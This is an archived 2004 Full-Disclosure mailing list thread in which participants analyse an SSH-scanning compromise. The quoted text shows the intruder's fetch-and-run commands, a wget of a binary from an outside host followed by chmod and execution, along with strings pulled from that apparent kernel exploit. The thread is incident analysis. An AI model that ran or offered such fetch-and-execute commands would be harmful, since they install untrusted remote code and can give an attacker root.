lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: venom at gen-x.co.nz (VeNoMouS)
Subject: Betr.: RE: Automated ssh scanning

LOL that file is infected with rst.b and you ran it?? hope it was inside a 
chroot() other wise time to replace every elf binary >:)




----- Original Message ----- 
From: "Blue Boar" <BlueBoar@...evco.com>
To: "Todd Towles" <toddtowles@...okshires.com>
Cc: "Pascal Zoutendijk" <Pascal.Zoutendijk@...a.nl>; "Mailing List - 
Full-Disclosure" <full-disclosure@...ts.netsys.com>
Sent: Friday, August 27, 2004 9:12 AM
Subject: Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning


> Todd Towles wrote:
>
>> It could be, but he said it was patched. I didn't run the test of
>> course. I never said it was the kernel however, it could be a service 
>> running.
>> And unknown does not equal zero-day. But the tool got root and he
>> doesn't know how. That is the point. Kernel, old service, whatever. It
>> would be nice to find it.
>
> If you take a look at this bit:
>
> wget www.bo2k-rulez.net/a
> chmod +x a
> ./a
>
> The file "a" gives every superficial indication that it's a kernel 
> exploit, if you want to go by a 20-second Notepad analysis:
>
> [-] Unable to exit, entering neverending loop.
>                  Kernel seems not to be vulnerable double allocation
>             Unable to determine kernel address Unable to set up LDT Unable 
> to change page protection Invalid LDT entry Unable to jump to call gate 
> /bin/sh Unable to spawn shell
>                    PATH=/usr/bin:/bin:/usr/sbin:/sbin Unable to allocate 
> memory Unable to unmap stack Unable to expand BSS 
> /proc/sys/kernel/osrelease FATAL: kernel too old
>        FATAL: cannot determine library version
>  /dev/null  ;?..;?..(?..??..??..                        malloc: using 
> debugging hooks
>   realloc(): invalid pointer %p!
>  malloc: top chunk is corrupt
>  Arena %d:
>  system bytes     = %10u
>  in use bytes     = %10u
>  Total (incl. mmap):
>  max mmap regions = %10u
>  max mmap bytes   = %10lu
>  free(): invalid pointer %p!
>  TOP_PAD_ MMAP_MAX_ TRIM_THRESHOLD_ MMAP_THRESHOLD_
>
> BB
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ